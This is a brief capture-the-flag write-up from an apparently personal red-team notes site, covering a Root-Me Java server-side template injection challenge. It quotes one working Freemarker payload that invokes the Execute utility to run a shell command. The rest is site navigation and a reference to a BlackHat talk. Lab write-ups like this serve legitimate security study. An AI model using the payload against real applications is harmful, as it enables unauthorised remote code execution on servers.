Skip to content
logo
Red team
Java: Server-side Template Injection (SSTI)
  • Green team
  • Blue team
  • Purple team
  • Ty Myrddin
Initializing search
      • IN: Where the falcons and foxes roam
        • Swoop like falcons, silent, precise, and lethally patient
        • Mapping the lay of the land
        • Fox hunting through the digital wilds
        • A canopy of apple-blossom
          • Field notes from the fragrant branches of web app exploitation
          • Portswigger Academy labs: Controlled burn
          • Root-me: Orchard foraging
            • Root-Me Web client challenges
            • Root-Me Web server challenges
              • Insecure code management
              • Directory traversal
              • File upload: null byte
              • PHP assert()
              • PHP Filters
              • PHP Register globals
              • JWT Introduction
              • JWT (not) revoked token
              • JWT weak secret
              • Python: Server-side Template Injection Introduction
              • Command injection: filter bypass
              • Java: Server-side Template Injection (SSTI)
                • Resources
              • Local file inclusion
              • Local file inclusion: double encoding
              • PHP preg_replace
              • PHP type juggling
              • SQL injection: authentication
              • SQL injection: string
              • XSLT code execution
              • PHP path truncation
              • PHP serialisation
              • SQL injection: numeric
              • SQL injection: routed
              • SQL truncation
              • XPath injection: authentication
              • SQL injection: time-based
          • Petals and pentesting priorities
        • Getting a foothold in the top of the world tree
        • Hack the planet? Nah, just hold the door for me
        • Where wild boars plough through endpoints
        • Wolverines do not ask for permissions
        • Riches in the ground
      • THROUGH: Where the raccoons burrow and rummage
      • OUT: Where squirrels swipe the crown jewels
    • Resources

    Java: Server-side Template Injection (SSTI)¶

    root-me challenge: Java - Server-side Template Injection: Exploit the vulnerability in order to retrieve the validation password in the file SECRET_FLAG.txt.

    PayLoadAllTheThings Freemarker code execution

    ${"freemarker.template.utility.Execute"?new()("ls -la")}

    etcetera.

    Resources¶

    • Server-Side Template Injection RCE For The Modern Web App - BlackHat 15

    Last update: 2025-05-12 14:16
    Back to top
    Previous Command injection: filter bypass
    Next Local file inclusion
    © Copyright 2025, TyMyrddin.
    Created using Sphinx 7.2.6. and Sphinx-Immaterial

    Made with love in the Unseen University, 2025, with a forest garden fostered by /ut7